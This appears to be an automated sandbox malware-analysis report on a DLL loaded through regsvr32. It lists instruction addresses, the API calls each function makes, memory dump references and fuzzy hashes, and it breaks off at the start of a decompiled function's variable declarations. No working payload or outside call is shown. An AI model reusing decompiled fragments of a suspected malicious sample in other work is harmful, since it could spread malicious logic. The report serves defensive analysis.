0x6e44ef2a
0x6e44ef39
0x6e44ef47
0x6e44ef56
0x6e44ef65
0x6e44ef73
0x6e44ef82
0x6e44ef8e
0x6e44ef9c
0x6e44efab
0x6e44efb7
0x6e44efc3
0x6e44efcf
0x6e44efde
0x6e44efea
0x6e44eff9
0x6e44f008
0x6e44f016
0x6e44f025
0x6e44f034
0x6e44f03f
0x6e44f04e
0x6e44f05d
0x6e44f06b
0x6e44f07a
0x6e44f089
0x6e44f097
0x6e44f0a3
0x6e44f0b2
0x6e44f0c0
0x6e44f0cf
0x6e44f0de
0x6e44f0ea
0x6e44f0f9
0x6e44f108
0x6e44f116
0x6e44f125
0x6e44f134
0x6e44f142
0x6e44f14e
0x6e44f15a
0x6e44f168
0x6e44f177
0x6e44f186
0x6e44f192
0x6e44f1a1
0x6e44f1b0
0x6e44f1bc
0x6e44f1cb
0x6e44f1da
0x6e44f1e8
0x6e44f1f7
0x6e44f206
0x6e44f214
0x6e44f220
0x6e44f22f
0x6e44f23b
0x6e44f24a
0x6e44f259
0x6e44f265
0x6e44f271
0x6e44f280
0x6e44f28c
0x6e44f29b
0x6e44f2a7
0x6e44f2b5
0x6e44f2c4
0x6e44f2d3
0x6e44f2e1
0x6e44f2ed
0x6e44f2fc
0x6e44f30a
0x6e44f319
0x6e44f325
0x6e44f331
0x6e44f340
0x6e44f34f
0x6e44f35b
0x6e44f367
0x6e44f376
0x6e44f382
0x6e44f38e
0x6e44f39d
0x6e44f3ab
0x6e44f3ba
0x6e44f3c3
0x6e44f3cf
0x6e44f3de
0x6e44f3ed
0x6e44f3fb
0x6e44f407
0x6e44f413
0x6e44f421
0x6e44f430
0x6e44f43c
0x6e44f44a
0x6e44f459
0x6e44f468
0x6e44f476
0x6e44f482
0x6e44f48e
0x6e44f49c
0x6e44f4a8
0x6e44f4b7
0x6e44f4c5
0x6e44f4d4
0x6e44f4e3
0x6e44f4f1
0x6e44f500
0x6e44f50f
0x6e44f51b
0x6e44f52a
0x6e44f539
0x6e44f545
0x6e44f554
0x6e44f560
0x6e44f56e
0x6e44f57d
0x6e44f58c
0x6e44f59a
0x6e44f5a9
0x6e44f5b8
0x6e44f5c6
0x6e44f5d5
0x6e44f5e4
0x6e44f5f2
0x6e44f601
0x6e44f610
0x6e44f61c
0x6e44f62b
0x6e44f63a
0x6e44f648
0x6e44f657
0x6e44f666
0x6e44f674
0x6e44f683
0x6e44f692
0x6e44f69e
0x6e44f6ad
0x6e44f6bc
0x6e44f6ca
0x6e44f6d9
0x6e44f6e8
0x6e44f6f4
0x6e44f700
0x6e44f70f
0x6e44f71d
0x6e44f72c
0x6e44f735
0x6e44f743
0x6e44f752
0x6e44f75e
0x6e44f767
0x6e44f773
0x6e44f782
0x6e44f78e
0x6e44f79d
0x6e44f7ac
0x6e44f7ba
0x6e44f7c9
0x6e44f7d8
0x6e44f7e4
0x6e44f7f3
0x6e44f802
0x6e44f810
0x6e44f81c
0x6e44f828
0x6e44f834
0x6e44f843
0x6e44f852
0x6e44f860
0x6e44f86c
0x6e44f878
0x6e44f886
0x6e44f892
0x6e44f8a1
0x6e44f8af
0x6e44f8be
0x6e44f8cd
0x6e44f8db
0x6e44f8ea
0x6e44f8f9
0x6e44f907
0x6e44f913
0x6e44f922
0x6e44f930
0x6e44f93c
0x6e44f948
0x6e44f956
0x6e44f962
0x6e44f971
0x6e44f97f
0x6e44f98e
0x6e44f99d
0x6e44f9ab
0x6e44f9ba
0x6e44f9c6
0x6e44f9d4
0x6e44f9e3
0x6e44f9ef
0x6e44f9fb
0x6e44fa07
0x6e44fa16
0x6e44fa24
0x6e44fa30
0x6e44fa3f
0x6e44fa4d
0x6e44fa59
0x6e44fa68
0x6e44fa76
0x6e44fa85
0x6e44fa94
0x6e44faa0
0x6e44faaf
0x6e44fabe
0x6e44facc
0x6e44fad8
0x6e44fae7
0x6e44faf3
0x6e44fb02
0x6e44fb0e
0x6e44fb1c
0x6e44fb2b
0x6e44fb37
0x6e44fb45
0x6e44fb51
0x6e44fb60
0x6e44fb6e
0x6e44fb7d
0x6e44fb8c
0x6e44fb9a
0x6e44fba9
0x6e44fbb8
0x6e44fbc4
0x6e44fbd0
0x6e44fbdf
0x6e44fbed
0x6e44fbfc
0x6e44fc0b
0x6e44fc19
0x6e44fc28
0x6e44fc37
0x6e44fc45
0x6e44fc51
0x6e44fc60
0x6e44fc6e
0x6e44fc7d
0x6e44fc8c
0x6e44fc9a
0x6e44fca9
0x6e44fcb5
0x6e44fcc1
0x6e44fcd0
0x6e44fcdf
0x6e44fcea
0x6e44fcf9
0x6e44fd08
0x6e44fd16
0x6e44fd25
0x6e44fd34
0x6e44fd40
0x6e44fd4f
0x6e44fd5e
0x6e44fd6c
0x6e44fd7b
0x6e44fd87
0x6e44fd95
0x6e44fda4
0x6e44fdb4
0x6e44fdc1
0x6e44fdd4
0x6e44fde0
0x6e44fdee
0x6e44fdee
0x6e44fdfd
0x6e44fe08
0x6e44fe08
0x6e44fe17
0x6e44fe25
0x6e44fe25
0x6e44fe35
0x6e44fe48
0x6e44fe5a
0x6e44fe68
0x6e44fe68
0x6e44fe77
0x6e44fe85
0x6e44fe85
0x6e44fe92
0x6e44fea4
0x6e44feb2
0x6e44feb2
0x6e44fec5
0x6e44fed8
0x6e44fee8
0x6e44fefa
0x6e44ff08
0x6e44ff08
0x6e44ff1b
0x6e44ff2e
0x6e44ff3b
0x6e44ff4e
0x6e44ff5d
0x6e44ff6b
0x6e44ff6b
0x6e44ff7a
0x6e44ff85
0x6e44ff85
0x6e44ff94
0x6e44ffa2
0x6e44ffa2
0x6e44ffae
0x6e44ffb9
0x6e44ffb9
0x6e44ffcb
0x6e44ffd9
0x6e44ffd9
0x6e44ffeb
0x6e44fff3
0x6e44fff3
0x6e450006
0x6e450018
0x6e450026
0x6e450026
0x6e450039
0x6e450046
0x6e450058
0x6e450060
0x6e450060
0x6e450073
0x6e450085
0x6e450093
0x6e450093
0x6e4500a5
0x6e4500b3
0x6e4500b3
0x6e4500c0
0x6e4500d2
0x6e4500e0
0x6e4500e0
0x6e4500f0
0x6e450103
0x6e450116
0x6e450125
0x6e450133
0x6e450133
0x6e450143
0x6e450155
0x6e450160
0x6e450160
0x6e450173
0x6e450183
0x6e450193
0x6e4501a3
0x6e4501b6
0x6e4501c5
0x6e4501d3
0x6e4501d3
0x6e4501e6
0x6e4501f8
0x6e450206
0x6e450206
0x6e450219
0x6e45022c
0x6e45023b
0x6e450246
0x6e450246
0x6e450258
0x6e450263
0x6e450263
0x6e450275
0x6e450280
0x6e450280
0x6e450293
0x6e4502a6
0x6e4502b9
0x6e4502cb
0x6e4502d9
0x6e4502d9
0x6e4502e8
0x6e4502f3
0x6e4502f3
0x6e450303
0x6e450313
0x6e450326
0x6e450335
0x6e450343
0x6e450343
0x6e450355
0x6e450363
0x6e450363
0x6e450375
0x6e450383
0x6e450383
0x6e450395
0x6e4503a3
0x6e4503a3
0x6e4503b3
0x6e4503c6
0x6e4503d8
0x6e4503e6
0x6e4503e6
0x6e4503f6
0x6e450405
0x6e450410
0x6e450410
0x6e450420
0x6e450432
0x6e450440
0x6e450440
0x6e450453
0x6e450465
0x6e450473
0x6e450473
0x6e450482
0x6e45048d
0x6e45048d
0x6e45049c
0x6e4504aa
0x6e4504aa
0x6e4504b9
0x6e4504c7
0x6e4504c7
0x6e4504d3
0x6e4504e1
0x6e4504e1
0x6e4504f1
0x6e450503
0x6e450511
0x6e450511
0x6e450523
0x6e450531
0x6e450531
0x6e450541
0x6e450553
0x6e450561
0x6e450561
0x6e450573
0x6e45057e
0x6e45057e
0x6e45058e
0x6e4505a0
0x6e4505ae
0x6e4505ae
0x6e4505c1
0x6e4505d3
0x6e4505e1
0x6e4505e1
0x6e4505f4
0x6e450607
0x6e450616
0x6e450624
0x6e450624
0x6e450637
0x6e450649
0x6e450654
0x6e450654
0x6e450667
0x6e450679
0x6e450687
0x6e450687
0x6e450696
0x6e4506a1
0x6e4506a1
0x6e4506b4
0x6e4506c7
0x6e4506d6
0x6e4506e1
0x6e4506e1
0x6e4506f3
0x6e450701
0x6e450701
0x6e450714
0x6e450727
0x6e450739
0x6e450747
0x6e450747
0x6e450759
0x6e450767
0x6e450767
0x6e450779
0x6e450787
0x6e450787
0x6e450797
0x6e4507aa
0x6e4507ba
0x6e4507c9
0x6e4507d7
0x6e4507d7
0x6e4507e9
0x6e4507f4
0x6e4507f4
0x6e450806
0x6e450814
0x6e450814
0x6e450826
0x6e450831
0x6e450831
0x6e450840
0x6e45084e
0x6e45084e
0x6e45085b
0x6e45086a
0x6e450875
0x6e450875
0x6e450888
0x6e450898
0x6e4508ab
0x6e4508be
0x6e4508ce
0x6e4508e1
0x6e4508f1
0x6e450903
0x6e45090e
0x6e45090e
0x6e45091e
0x6e450930
0x6e450938
0x6e450938
0x6e450947
0x6e450952
0x6e450952
0x6e450964
0x6e450972
0x6e450972
0x6e450985
0x6e450998
0x6e4509a8
0x6e4509b8
0x6e4509cb
0x6e4509d7
0x6e4509e5
0x6e4509e5
0x6e4509f8
0x6e450a0a
0x6e450a15
0x6e450a15
0x6e450a28
0x6e450a3b
0x6e450a4a
0x6e450a55
0x6e450a55
0x6e450a65
0x6e450a75
0x6e450a88
0x6e450a9b
0x6e450aae
0x6e450abd
0x6e450ac8
0x6e450ac8
0x6e450ad7
0x6e450ae2
0x6e450ae2
0x6e450af1
0x6e450aff
0x6e450aff
0x6e450b0f
0x6e450b21
0x6e450b2f
0x6e450b2f
0x6e450b3c
0x6e450b4e
0x6e450b5c
0x6e450b5c
0x6e450b6f
0x6e450b7f
0x6e450b8f
0x6e450ba2
0x6e450bb5
0x6e450bc7
0x6e450bd5
0x6e450bd5
0x6e450be8
0x6e450bf7
0x6e450c05
0x6e450c05
0x6e450c18
0x6e450c2a
0x6e450c32
0x6e450c32
0x6e450c44
0x6e450c4f
0x6e450c4f
0x6e450c5e
0x6e450c69
0x6e450c69
0x6e450c79
0x6e450c8c
0x6e450c98
0x6e450ca6
0x6e450ca6
0x6e450cb6
0x6e450cc8
0x6e450cd6
0x6e450cd6
0x6e450ce9
0x6e450cf9
0x6e450d09
0x6e450d1c
0x6e450d2c
0x6e450d3e
0x6e450d49
0x6e450d49
0x6e450d59
0x6e450d68
0x6e450d76
0x6e450d76
0x6e450d85
0x6e450d90
0x6e450d90
0x6e450da3
0x6e450db2
0x6e450dc0
0x6e450dc0
0x6e450dd3
0x6e450de3
0x6e450df2
0x6e450dfa
0x6e450dfa
0x6e450e09
0x6e450e11
0x6e450e11
0x6e450e20
0x6e450e2e
0x6e450e2e
0x6e450e3d
0x6e450e4b
0x6e450e4b
0x6e450e5d
0x6e450e6b
0x6e450e6b
0x6e450e77
0x6e450e85
0x6e450e85
0x6e450e97
0x6e450ea5
0x6e450ea5
0x6e450eb5
0x6e450ec8
0x6e450ed5
0x6e450ee2
0x6e45192f
0x6e451938

APIs

VirtualAlloc.KERNEL32(00000000,0000016A,00001000,00000004), ref: 6E44E51F

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6ea6d4fc0af63ca706075f44d3482c28161bf4a9368dd3204f2be4ccaa9f8b7f
Instruction ID: b5656ee0313d73a00513fcb78f83a7e6485204496dadfd32654198354c15ab35
Opcode Fuzzy Hash: 6ea6d4fc0af63ca706075f44d3482c28161bf4a9368dd3204f2be4ccaa9f8b7f
Instruction Fuzzy Hash: 46733A719015299BDB68CF48CD91BDDBBB1BF84348F1481E9D50DAB346D730AAA1CF88

Uniqueness

Uniqueness Score: -1.00%

Function 6E42AA02 Relevance: 3.6, APIs: 1, Instructions: 2380memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,000001A1,00001000,00000004), ref: 6E42AA1C

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 260e303819a667fc785b26425d62b71750f2419c85c57ef927c429f09cc625a2
Instruction ID: cda51d4fe9994eacd383819b7d899c26ae735f9135d7c1ca63b370da9ca359e4
Opcode Fuzzy Hash: 260e303819a667fc785b26425d62b71750f2419c85c57ef927c429f09cc625a2
Instruction Fuzzy Hash: FD631E709055299FDB64CF08CD90BD9BBB2EF84349F1481E9D50DAB346D734AAA1CF88

Uniqueness

Uniqueness Score: -1.00%

Function 6E463767 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,6E464ED4,6E464EC8,00000000), ref: 6E463799

Strings

, xrefs: 6E4637DE

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 13069004ce407427c90595bd28c385a1ad7bdd443f75994057874bf0b6e9576f
Instruction ID: 404037eedfa605c2985649efb21dfc1a7c41b1d915d1ae6c77e8c2e90962205f
Opcode Fuzzy Hash: 13069004ce407427c90595bd28c385a1ad7bdd443f75994057874bf0b6e9576f
Instruction Fuzzy Hash: 04414BB09046D85FEB118FB9CC98FFA7BFDEB85708F1404AEE58687142D274A9498B50

Uniqueness

Uniqueness Score: -1.00%

Function 6E46134C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsAlloc.KERNEL32 ref: 6E461380

Strings

FlsAlloc, xrefs: 6E46135C

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 3c94fbf651cf945d287589ead246ba4bbb9cbad3b159e9273158ca47bd7c310e
Instruction ID: b20ce3ae7fd8b517c12590c126f739e21c2fad0ee9684bc72499e3c896d9c3dc
Opcode Fuzzy Hash: 3c94fbf651cf945d287589ead246ba4bbb9cbad3b159e9273158ca47bd7c310e
Instruction Fuzzy Hash: C0E0C272641564679B4136F15C18EEE7F08CB59AB0B000023F90D6E314CA6058418AD5

Uniqueness

Uniqueness Score: -1.00%

Function 6E45A7BC Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6E45A809

Part of subcall function 6E45AEB6: InitializeSListHead.KERNEL32(6E474FF0,6E45A813,6E4723F0,00000010,6E45A7A4,?,?,?,6E45A9CC,?,00000001,?,?,00000001,?,6E472438), ref: 6E45AEBB

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E45A873

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: cf1f470581db5badf5b0cc8c69a36e6106fcc536cc2b22fff89a4190440755f5
Instruction ID: 1f7f549760e92afc40d22e0bfa2f9aeecf5e06b038d1898bd40d7d5a10a0adf5
Opcode Fuzzy Hash: cf1f470581db5badf5b0cc8c69a36e6106fcc536cc2b22fff89a4190440755f5
Instruction Fuzzy Hash: 7E21F331948245AEDF50ABF49410FDC33A49F0626DF10481FD8A12B3C1CB311066FAF5

Uniqueness

Uniqueness Score: -1.00%

Function 6E45C0A6 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E45C0C4
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 6E45C0CF

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 810e9fcae74844a01e6bb48c2e5d8dff0bb4d737d30d8ae7ef9ba170d2ca7cbf
Instruction ID: e05adfe9877ecd473d49a22979da5b82f20e9e8f7248fbf34638a5429857e2fe
Opcode Fuzzy Hash: 810e9fcae74844a01e6bb48c2e5d8dff0bb4d737d30d8ae7ef9ba170d2ca7cbf
Instruction Fuzzy Hash: B1D0A922028701280C48A6F42820CCF23687902BBE3600B4FD421CD3C8EF90C0236AA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E457B2C Relevance: 2.5, APIs: 2, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,0000015A,00001000,00000004), ref: 6E457B46
VirtualAlloc.KERNEL32(00000000,0000007B,00001000,00000004), ref: 6E457B60

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3f44d31b345cdc50320a03fcb706560aa4e1575a322b8a71cfd7e325920d3835
Instruction ID: 1d0b29ac0ca3b9e6660cca90a346903ddf4bd93e9ecd190a98b2dc6d9b4dc532
Opcode Fuzzy Hash: 3f44d31b345cdc50320a03fcb706560aa4e1575a322b8a71cfd7e325920d3835
Instruction Fuzzy Hash: D8E0BF75684745BAEB609EA0DC4AF847B21AB05BF6F508612BB4D6D3D1C3B051918544

Uniqueness

Uniqueness Score: -1.00%

Function 6E46126A Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd28c7d3af1e21333e48c1a9035ea134396343440d7a664156da10602eb0c442
Instruction ID: 431070561905cf7e599c6a29c37c9e0b61dfa400bc77fd46d396b188b54f88cf
Opcode Fuzzy Hash: bd28c7d3af1e21333e48c1a9035ea134396343440d7a664156da10602eb0c442
Instruction Fuzzy Hash: 2B01B5776505625FAF069DFEEC40D5A33DAABCA7607144127FA18EB388DB30D80687D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4658B3 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6E4610F8: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E46100E,00000001,00000364,00000006,000000FF,?,6E46030E,?,00000004,?,?,?), ref: 6E461139

_free.LIBCMT ref: 6E465922

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 2008b6b740e828f5b252f5276c686fd0b707e74ea0eb8aef96d5b7cf1afe7e2b
Instruction ID: 2bbcc4688c634e9a3e6a3608b8b4364accfc38279617755cc292165d442ea431
Opcode Fuzzy Hash: 2008b6b740e828f5b252f5276c686fd0b707e74ea0eb8aef96d5b7cf1afe7e2b
Instruction Fuzzy Hash: A6012672A083566FC7208FB9D880DC9FBA8FB053B0F144A2EE555A77C0E3706814C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4610F8 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E46100E,00000001,00000364,00000006,000000FF,?,6E46030E,?,00000004,?,?,?), ref: 6E461139

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 83f967c829320c89781fbd24f5f5e71726fe0ec0acb0edc65a21c45a7b09fac8
Instruction ID: 334f29ba20014213babb2a2e608eb8dd705ba1e826b86e70147e82e2d84c1e5e
Opcode Fuzzy Hash: 83f967c829320c89781fbd24f5f5e71726fe0ec0acb0edc65a21c45a7b09fac8
Instruction Fuzzy Hash: 43F0B4316156255AAF911EF69815FCA77B8AF4AAA0B008027EC1CDA384DB20FC0986E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E45D191 Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,6E45D22F,00000001,FlsFree,6E46CDBC,FlsFree,00000000,?,6E45C0E9,00000005,6E45B6CE), ref: 6E45D1C2

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 40a26fd1d9d05610c6e9a721c0f42aceb948a787229f6898363c81f8899489e8
Instruction ID: c6a531c4a8b27fce58a8b4feb8fbc3ecafd389d6108fdf0e34e6d8d12a5d4a59
Opcode Fuzzy Hash: 40a26fd1d9d05610c6e9a721c0f42aceb948a787229f6898363c81f8899489e8
Instruction Fuzzy Hash: 7DF01C3620425BAF9F556EF9AC10C9B77A9BF417607104526ED25DA390EB31E430CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E419910 Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 610
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E419910(void* __eflags) {
				int _v8;
				intOrPtr _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				void* _v21;
				signed int _v22;
				signed char _v23;
				void* _v24;
				signed int _v25;
				signed char _v26;
				void* _v27;
				signed int _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr* _v112;
				int _v116;
				intOrPtr _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				int _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				int* _v148;
				intOrPtr* _v152;
				int _v156;
				intOrPtr _v160;
				signed int _v164;
				int* _v168;
				intOrPtr* _v172;
				char _v176;
				int _v180;
				char _v184;
				char _v188;
				int _v192;
				int _v196;
				intOrPtr _v200;
				intOrPtr* _v204;
				intOrPtr _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				int _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				intOrPtr* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr* _v272;
				intOrPtr _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				int _v300;
				intOrPtr* _v304;
				intOrPtr _v308;
				intOrPtr* _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr* _v340;
				intOrPtr _v344;
				signed int _v348;
				intOrPtr* _v352;
				signed int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				int _v368;
				intOrPtr* _v372;
				intOrPtr _v376;
				intOrPtr* _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
